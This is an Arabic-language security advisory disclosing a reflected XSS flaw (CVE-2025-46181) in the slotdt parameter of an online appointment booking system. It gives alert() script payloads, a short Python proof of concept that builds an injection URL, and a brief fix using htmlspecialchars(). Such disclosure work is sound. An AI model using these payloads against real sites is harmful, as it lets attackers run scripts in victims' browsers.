
إفصاح عن ثغرة XSS المنعكسة مع نص PoC وإرشادات المعالجة لنظام حجز مواعيد عبر الإنترنت. يتضمن تحليل المعلمة الضعيفة وتقييم الأثر.
معرّف CVE: CVE-2025-46181
اكتشفها: Shemkumar P (shemkumar.github.io)
نوع الثغرة: البرمجة النصية عبر المواقع المنعكسة (Reflected XSS)
الخطورة: متوسطة
الحالة: مُفصح عنها، تم تخصيص CVE من قبل MITRE
توجد ثغرة البرمجة النصية عبر المواقع المنعكسة (Reflected XSS) في نظام عام لحجز المواعيد عبر الإنترنت (الإصدار 1.0)، وتحديدًا في الصفحة التي تتعامل مع تأكيد الموعد. يفشل معامل GET في تعقيم المُدخلات بشكل صحيح، مما يتيح حقن JavaScript وتنفيذ أكواد في متصفح الضحية.
GET /confirmapp.php?slotdt=<payload>
مثال على الحمولة (مشفّرة):
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 تم حجب الرابط المباشر لأسباب أخلاقية. تم اختبار هذه الثغرة في بيئة خاضعة للتحكم.
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
يجب على التطبيق:
htmlspecialchars() لترميز مدخلات المستخدم في PHPShemkumar P
🕸️ shemkumar.github.io
🔐 باحث في الأمن السيبراني | مهتم بمسابقات CTF | مُبلغ عن ثغرات CVE
⚠️ هذا المنشور مخصص للاستخدام التعليمي والدفاعي فقط. اختبار أو استغلال الثغرات على أنظمة لا تملكها أو ليس لديك إذن صريح لاستخدامها يعد غير قانوني وغير أخلاقي.